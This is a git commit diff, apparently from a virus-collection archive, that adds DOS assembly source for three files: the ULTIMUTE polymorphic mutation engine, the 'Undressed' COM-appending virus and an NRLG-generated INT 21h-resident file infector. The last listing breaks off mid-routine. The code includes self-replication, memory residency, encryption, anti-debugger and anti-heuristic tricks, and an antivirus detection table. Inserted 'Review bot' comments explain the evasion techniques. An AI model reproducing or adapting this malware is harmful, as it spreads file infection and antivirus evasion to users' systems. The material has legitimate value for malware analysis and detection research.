re-organize

push
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
@@ -0,0 +1,584 @@
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; The ULTImate MUTation Engine .93á (c) 1993 Black Wolf Enterprises
; pardon the title, had to think of something... }-)
;
;ULTIMUTE is a mutation engine written for security-type applications and
;other areas where mutation of executable code is necessary. For my personal
;use, I have implemented it in Black Wolf's File Protection Utilities 2.1s,
;using it to encrypt the code placed onto EXE's and COM's to protect them
;from simple modification and/or unauthorized use. The encryption algorithms
;themselves are terribly simple - the main point being that they change
;each time and are difficult to trace through. This engine is written mainly
;to keep a "hack one, hack 'em all" approach from working on protected code,
;rather than to keep the code secure by a cryptologist's point of view.
;
;Including: Better Anti-Tracing abilities, 1017 byte size, Anti-Disassembling
; code, largely variable size for decoder. Also includes variable
; calling segmentation (i.e. CS<>ES<>DS, and can be called via
; near call, far call, or interrupt, the last of which can be
; useful as a memory-resident handler for multiple programs to
; use).
;
;Note: Please - this program and it's source have been released as freeware,
; but do NOT use the mutation engine in viruses! For one thing, the
; decryptor sequence has several repetitive sequences that can be scanned
; for, and for another, that just isn't what it was designed for and
; I would NOT appreciate it. If you MUST use someone else's mutation
; engine for such, use the TPE or MTE. I do NOT condone such, however.
;
;Any modifications made to this program should be listed below the solid line,
;along with the name of the programmer and the date the file was changed.
;Also - they should be commented where changed. If at all possible, report
;modifications to file to the address listed in the documentation.
;
;DISCLAIMER: The author takes ABSOLUTELY NO RESPONSIBILITY for any damages
;resulting from the use/misuse of this program. The user agrees to hold
;the author harmless for any consequences that may occur directly or
;indirectly from the use of this program by utilizing this program/file
;in any manner. Please use the engine with care.
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Modifications:
; None as of yet (original release version)
.model tiny
.radix 16
.code
public _ULTMUTE, _END_ULTMUTE, Get_Rand, Init_Rand
;Underscores are used so that these routines can be called from C and other
;upper level languages. If you wish to use Get_Rand and Init_Rand in C, you
;need to add underscores in their names as well. Also, the random number
;generations may not be sound for all purposes. They do the job for this
;program, but they may/may not be mathematically correct.
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ENTRY:
; CX=Code Length BX=New_Entry_Point
; DS:SI=Code AX=Calling Style
; ES:DI=Destination 1=Near Call, 2=Far Call, 3=Int Call
;
;RETURN:
; CX=New Size ES:DI = Same, now contains encrypted code
; w/decryptor
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
_ULTMUTE:
push bp ax bx cx dx es ds si di
call Get_Our_Offset
Offset_Mark:
inc cx
inc cx
mov word ptr cs:[bp+1+Set_Size],cx
mov word ptr cs:[Start_Pos+bp],bx
call Init_Rand
call Get_Base_Reg
call Setup_Choices
call Create_EncDec
call Copy_Decrypt_Code
call Encrypt_It
Ending_ULTMUTE:
pop di si ds es dx cx bx ax
add cx,cs:[Decryptor_Length+bp]
inc cx
inc cx
pop bp
cmp ax,3 ;Select Returning method, i.e. retn, retf, iret
je Int_Call
cmp ax,2
je Far_Call
Near_Call:
retn
Far_Call:
retf
Int_Call:
iret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Get_Our_Offset:
mov bp,sp
mov bp,ss:[bp] ;This trick finds our current offset
sub bp,offset Offset_Mark ;from the compiling point, as it
ret ;is usually not constant....
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Init_Rand:
push ax ds
xor ax,ax
mov ds,ax
mov ax,ds:[46c] ;Get seed from timer click at
pop ds ;0000:046c
mov cs:[rand_seed+bp],ax
pop ax
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Get_Rand:
push cx dx
mov ax,cs:[rand_seed+bp]
mov cx,0deadh
mul cx ;This probably isn't a good algorithm,
xor ax,0dada ;(understatement) but it works for
ror ax,1 ;our purposes in this application.
mov cs:[rand_seed+bp],ax
pop dx cx
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
rand_seed dw 0
Base_Reg db 0
Base_Pointer db 0
Start_Pos dw 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Get_Base_Reg:
call Get_Rand
and ax,11b
cmp al,1 ;Eliminate CX for loop purposes
je Get_Base_Reg
mov byte ptr cs:[bp+Base_Reg],al
Do_Pointer_Reg:
call Get_Rand
shr al,1
jc Done_Base_Reg
mov byte ptr cs:[bp+Base_Pointer],0
ret
Done_Base_Reg:
mov byte ptr cs:[bp+Base_Pointer],1
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Setup_Choices:
push ds si
push cs
pop ds
mov si,bp
call Get_Rand
mov word ptr [si+Xor_It+2],ax ;Randomize Xor
call Get_Rand
mov word ptr [si+Dummy3+2],ax ;Randomize Add/Sub
mov word ptr [si+Dummy7+2],ax
call Get_Rand ;Randomize Add/Sub
mov word ptr [si+Dummy4+2],ax
mov word ptr [si+Dummy8+2],ax
call Get_Rand
mov byte ptr [si+Rand_Byte1],al ;Randomize Random bytes
mov byte ptr [si+Rand_Byte2],ah
call Get_Rand
mov byte ptr [si+Rand_Byte3],al
mov byte ptr [si+Rand_Byte4],ah
call Get_Rand
mov byte ptr [si+Rand_Byte5],al
mov byte ptr [si+Rand_Byte6],ah
call Get_Rand
mov byte ptr [si+Rand_Byte7],al
mov byte ptr [si+Rand_Byte8],ah
call Get_Rand
mov byte ptr [si+Rand_Byte9],al
mov byte ptr [si+Rand_Byte10],ah
mov al,byte ptr [si+Base_Reg]
Set_Switcher:
and byte ptr [si+Switcher+1],0e6 ;Delete Register
mov ah,al
shl ah,1
shl ah,1
shl ah,1
or byte ptr [Switcher+1+si],ah
Set_Switcher_Pointer:
push ax
mov al,byte ptr [si+Base_Pointer]
or byte ptr [si+Switcher+1],al
Set_Set_Pointy:
and byte ptr [si+Set_Pointy],0fe
or byte ptr [si+Set_Pointy],al
and byte ptr [si+Inc_Pointy],0fe
or byte ptr [si+Inc_Pointy],al
and byte ptr [si+Inc_Pointy+1],0fe
or byte ptr [si+Inc_Pointy+1],al
pop ax
Set_Xorit:
and byte ptr [si+Xor_It+1],0fc
or byte ptr [si+Xor_It+1],al
Set_Flip_It:
and byte ptr [si+Flip_It+1],0e4
or byte ptr [si+Flip_It+1],al
or byte ptr [si+Flip_It+1],ah
Set_Rotate_It:
and byte ptr [si+do_rotate+1],0fc
or byte ptr [si+do_rotate+1],al
and byte ptr [si+do_rot2+1],0fc
or byte ptr [si+do_rot2+1],al
Set_IncDec:
and byte ptr [si+inc_bx_com],0fc
or byte ptr [si+inc_bx_com],al
and byte ptr [si+dec_bx_com],0fc
or byte ptr [si+dec_bx_com],al
and byte ptr [si+Dummy5],0fc
or byte ptr [si+Dummy5],al
and byte ptr [si+Dummy6],0fc
or byte ptr [si+Dummy6],al
Set_AddSub:
and byte ptr [si+Dummy3+1],0fc
and byte ptr [si+Dummy4+1],0fc
or byte ptr [si+Dummy3+1],al
or byte ptr [si+Dummy4+1],al
and byte ptr [si+Dummy7+1],0fc
and byte ptr [si+Dummy8+1],0fc
or byte ptr [si+Dummy7+1],al
or byte ptr [si+Dummy8+1],al
pop si ds
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Create_EncDec:
push es di cx
push cs
pop es
lea di,[bp+Encrypt_Sequence]
call Get_Rand
and ax,1fh
shr ax,1 ;Insure odd number of encryptors to prevent
shl ax,1 ;things like "INC AX / DEC AX" to leave prog
inc ax ;unencrypted.
mov byte ptr cs:[bp+Encrypt_Length],al
xchg cx,ax
Make_Pattern:
call Get_Rand
and ax,7
stosb
loop Make_Pattern
pop cx di es
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Copy_Decrypt_Code:
push si di bx cx ds
push bx di ;save for loop
push cs
pop ds
lea si,[bp+Set_Pointy]
movsw
movsb
lodsb ;Copy initial encryptor
movsw
movsb
lodsb
movsw
mov cl,byte ptr cs:[bp+Encrypt_Length]
xor ch,ch
lea si,[Encrypt_Sequence+bp] ;didn't have bp earlier
Dec_Set_Loop:
push cx
lodsb
push si ;Create the Decryptor from Sequence
mov bl,al
xor bh,bh
shl bx,1
add bx,bp
add bx,offset Command_Table
mov ax,cs:[bx]
mov cl,ah
xor ah,ah
lea si,[Xor_It+bp]
add si,ax
repnz movsb
pop si
pop cx
loop Dec_Set_Loop
lea si,[Switcher+bp]
movsw
lodsb ;Finish off Decryptor
movsw
lodsb
movsw ;Loop Setup
movsw
pop si bx
mov ax,di ;Set Loop
sub ax,si ;Do size of loop and offset from loop
mov cs:[Decryptor_Length+bp],ax
push ax ;Changed for Jump
not ax
add ax,5
stosw
pop ax
add bx,ax ;Set initial Pointer
mov es:[si+1],bx
mov ax,di
pop ds cx bx di si
push si di bx cx
Copy_Prog:
push ax
sub ax,di
add ax,bx
mov word ptr es:[di+1],ax
pop ax
mov di,ax
repnz movsb
pop cx bx di si
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Encrypt_It:
push bx cx di si
call set_seqp
mov ax,cs:[Decryptor_Length+bp]
inc ax
inc ax
add di,ax ;DI=start of code to be encrypted
;CX=Length of code to encrypt
mov si,di
push es
pop ds
Big_Enc_Loop:
push cx
call Switcher
mov cx,cs:[Encrypt_Length+bp]
Encrypt_Value:
push ax bx cx dx si di
mov si,cs:[Save_SI+bp]
dec si
mov bl,cs:[si] ;??
mov cs:[Save_SI+bp],si
lea si,cs:[Com_Table_2+bp]
xor bh,bh
shl bx,1
add si,bx
mov bx,cs:[si]
add bx,bp
mov word ptr cs:[Next_Command+bp],bx
pop di si dx cx bx ax
call cs:[Next_Command+bp]
Loop Encrypt_Value
pop cx
call Switcher
call Inc_Pointy
call set_seqp
loop Big_Enc_Loop
pop si di cx bx
ret
Save_SI dw 0
Next_Command dw 0
set_seqp:
push si
lea si,cs:[Encrypt_Sequence+bp] ;SI=Encrypt_Sequence
add si,cs:[Encrypt_Length+bp] ;SI=End of Encrypt Sequence
mov cs:[Save_SI+bp],SI
pop si
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Command_Table: ;8 commands -> 3 bits.
db [Xor_It-Xor_It],(Flip_It-Xor_It-1)
db [Flip_It-Xor_It],(Rotate_It_1-Flip_It-1)
db [Rotate_It_1-Xor_It],(Rotate_It_2-Rotate_It_1-1)
db [Rotate_It_2-Xor_It],(Dummy1-Rotate_It_2-1)
db [Dummy1-Xor_It],(Dummy2-Dummy1-1)
db [Dummy2-Xor_It],(Dummy3-Dummy2-1)
db [Dummy3-Xor_It],(Dummy4-Dummy3-1)
db [Dummy4-Xor_It],(Dummy5-Dummy4-1)
Com_Table_2:
dw [offset Xor_It]
dw [offset Flip_It]
dw [offset Rotate_It_2]
dw [offset Rotate_It_1]
dw [offset Dummy5]
dw [offset Dummy6]
dw [offset Dummy7]
dw [offset Dummy8]
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Set_Pointy:
mov di,1234 ;Pointer to Code
ret
Set_Size:
mov cx,1234 ;Size
ret
Switcher:
xchg bx,[di]
ret
Inc_Pointy:
inc di
inc di
ret
Loop_Mut:
dec cx
jz End_Loop_Mut
loop_set:
jmp _ULTMUTE
End_Loop_Mut:
ret
Xor_It:
xor bx,1234
ret
Flip_It:
xchg bh,bl
ret
Rotate_It_1:
jmp before_rot
do_rotate:
ror bx,1
jmp after_rot
before_rot:
push ax
call Ports1
pop ax
jmp do_rotate
Ports1:
in al,21
or al,02
out 21,al
ret
Ports2:
in al,21
xor al,02
out 21,al
ret
after_rot:
push ax
call ports2
pop ax
ret
Rotate_It_2:
cli
jmp confuzzled1
do_rot2:
rol bx,1
call Switch_Int_1_3
jmp donerot2
confuzzled1:
call Switch_Int_1_3
jmp do_rot2
Switch_Int_1_3:
push ax ds
xor ax,ax
mov ds,ax
jmp short exch1
db 0eah
exch1:
xchg ax,word ptr ds:[4]
jmp short exch2
db 9ah
exch2:
xchg ax,word ptr ds:[0c]
xchg ax,word ptr ds:[4]
pop ds ax
ret
donerot2:
ret
Dummy1:
jmp short inc_bx_com ;Kill Disassemblers
db 0ea
Rand_Byte1:
db 0ea
inc_bx_com:
inc bx
ret
Dummy2:
jmp short Kill_1
Rand_Byte2:
db 0ea
Cont_Kill1:
cli
xchg ax,ds:[84]
xchg ax,ds:[84]
sti
pop ds ax
dec_bx_com:
dec bx
jmp short quit_Kill1
Kill_1:
push ax ds
xor ax,ax
mov ds,ax ;Anti-Debugger (Kills Int 21)
jmp short Cont_Kill1
Rand_Byte3:
db 0e8
quit_Kill1:
ret
Dummy3:
add bx,1234
push bx
call throw_debugger
Rand_Byte4:
db 0e8 ;Prefetch Trick
into_throw:
sub bx,offset Rand_Byte4
add byte ptr [bx+trick_em+1],0ba
trick_em:
jmp short done_trick
Rand_Byte5:
db 0ea
throw_debugger:
pop bx
jmp short into_throw
Rand_Byte6:
db 0ea
done_trick:
sub byte ptr [bx+trick_em+1],0ba
pop bx
ret
Dummy4:
sub bx,1234
jmp short Get_IRQ
Rand_Byte7 db 0e8
Kill_IRQ:
out 21,al
xor al,2
jmp short Restore_IRQ
Rand_Byte8 db 0e8
Rand_Byte9 db 0e8 ;This will kill the keyboard
Get_IRQ: ;IRQ
push ax
in al,21
xor al,2
jmp short Kill_IRQ
Rand_Byte10 db 0e8
Restore_IRQ:
out 21,al
pop ax
ret
;The following are used for the encryption algorithm to reverse commands that
;include anti-tracing.
Dummy5:
dec bx
ret
Dummy6:
inc bx
ret
Dummy7:
sub bx,1234
ret
Dummy8:
add bx,1234
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Decryptor_Length dw 0
Encrypt_Length dw 0
Encrypt_Sequence db 30 dup(0)
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
_END_ULTMUTE:
end _ULTMUTE
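Review bot: The anti-tracing blocks from `Rotate_It_1` to `Dummy4` carry no comment on the machine state they change, and the one that exists (`;Anti-Debugger (Kills Int 21)`) does not say the change is undone two instructions later. With `.radix 16` in effect the bare operands are hexadecimal: `Ports1`, `Ports2` and `Get_IRQ`/`Kill_IRQ` rewrite bit 1 of the interrupt mask at port 21h, `Switch_Int_1_3` exchanges the words at 0000:0004 and 0000:000C (the INT 1 and INT 3 vector offsets), and `Cont_Kill1` swaps the word at 0000:0084 out and back under `cli`. I would put this above `Rotate_It_1`: `; Side effects: PIC mask bit 1 (port 21h) written; INT 1/INT 3 offsets swapped and swapped back; 0000:0084 zeroed and restored`. Anyone emulating or sandboxing a generated decryptor needs those accesses modelled, and since the blocks appear to be copied from this fixed template they are likely the parts that recur across variants, which the header itself concedes can be scanned for.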
+126
@@ -0,0 +1,126 @@
; Virus: The Undressed Virus
; Author: Arsonic[Codebreakers]
; Type: Appending
; Encryption: No
;
; Displays a Message on Feb 5th.
; Btw.. I Love Lisa..!
;---------------------------------------------------------------------------------------------------
; AV-Product | Detected? | Comments
;---------------------------------------------------------------------------------------------------
; F-Prot | No | Easy to Get Past.. FPROT SUCKS!
; TBAV | Unknown Virus | Well.. at least it aint say VCL!
; AVP | VCL.824 | VCL! ARRGGGHH!
;----------------------------------------------------------------------------------------------------
db 0e9h,0,0
start:
call delta
delta:
pop bp
sub bp,offset delta
mov cx,0ffffh ;kill heristics
fprot_loopy:
jmp back
mov ax,4c00h
int 21h
back:
loop fprot_loopy
mov cx,3
nop
mov di,100h
nop
lea si,[bp+buffer]
nop
rep movsb
find_first:
mov ah,4ch
add ah,2
nop
find_next:
nop
lea dx,[bp+filemask]
nop
int 21h
jnc infect
jmp check_payload
infect:
mov ax,3d02h
mov dx,9eh
int 21h
xchg ax,bx
mov ah,3dh
add ah,2
mov cx,3
lea dx,[bp+buffer]
int 21h
mov ax,word ptr[80h + 1ah]
nop
sub ax,end - start + 3
nop
cmp ax,word ptr[bp+buffer+1]
nop
je close_file
mov ax,word ptr[80h + 1ah]
nop
sub ax,3
nop
mov word ptr[bp+three+1],ax
mov ax,4200h
xor cx,cx
cwd
int 21h
mov ah,3eh
add ah,2
nop
lea dx,[bp+three]
nop
mov cx,3
nop
int 21h
mov ax,4202h
xor cx,cx
cwd
int 21h
mov ah,3eh
add ah,2
nop
lea dx,[bp+start]
nop
mov cx,end - start
nop
int 21h
close_file:
mov ah,3ch
add ah,2
int 21h
mov ah,4dh
add ah,2
jmp find_next
check_payload:
mov ah,2ah
int 21h
cmp dh,2 ;is it febuary?
je next
jmp close
next:
cmp dl,5 ;the 5th?
je payload ;yes.. display the message
jmp close ;no.. return control to the program.
payload:
mov ah,9h ;display message
lea dx,[bp+message]
int 21h
int 00h ;get keypress
int 16h
int 20h ;return to dos.
close:
mov di,100h ;return control to program
jmp di
three db 0e9h,0,0
filemask db '*.co*',0 ;if *.com it would be detected as trival variant
buffer db 0cdh,20h,0
virus db 'The UnDreSSeD',0 ; messages to give those av'ers a
author db 'Arsonic[CB]',0 ; nice scan string..
message db 'Happy Birthday Lisa!',10,13,'$'
Lisa db 'I LOVE U LISA!',0
end:
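Review bot: None of the `mov ah,NN` / `add ah,2` pairs (at `find_first`, after `xchg ax,bx`, before both writes, at `close_file` and before `jmp find_next`) carries a comment giving the DOS function actually requested, so the listing cannot be read without doing the arithmetic. Each should be annotated with the resulting value, for example `; AH = 4Eh, find first` and `; AH = 40h, write`, since the split appears to exist to keep the literal function number out of the byte stream. For triage the consequence is that a pattern on the immediate operand will not match this sample. The `virus`, `author` and `message` strings at the end of the file, by contrast, are stored in plaintext (the header states Encryption: No) and stay constant.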
@@ -0,0 +1,473 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿsub byte ptr [di],087h
inc word ptr [di]
xor byte ptr [di],022h
inc word ptr [di]
xor byte ptr [di],030h
add byte ptr [di],075h
xor byte ptr [di],061h
sub byte ptr [di],0b9h
xor word ptr [di],0e185h
add word ptr [di],0aa17h
not word ptr [di]
inc byte ptr [di]
inc word ptr [di]
xor word ptr [di],0c3d7h
sub word ptr [di],04a83h
not byte ptr [di]
xor word ptr [di],06acdh
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall ANTI_V
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
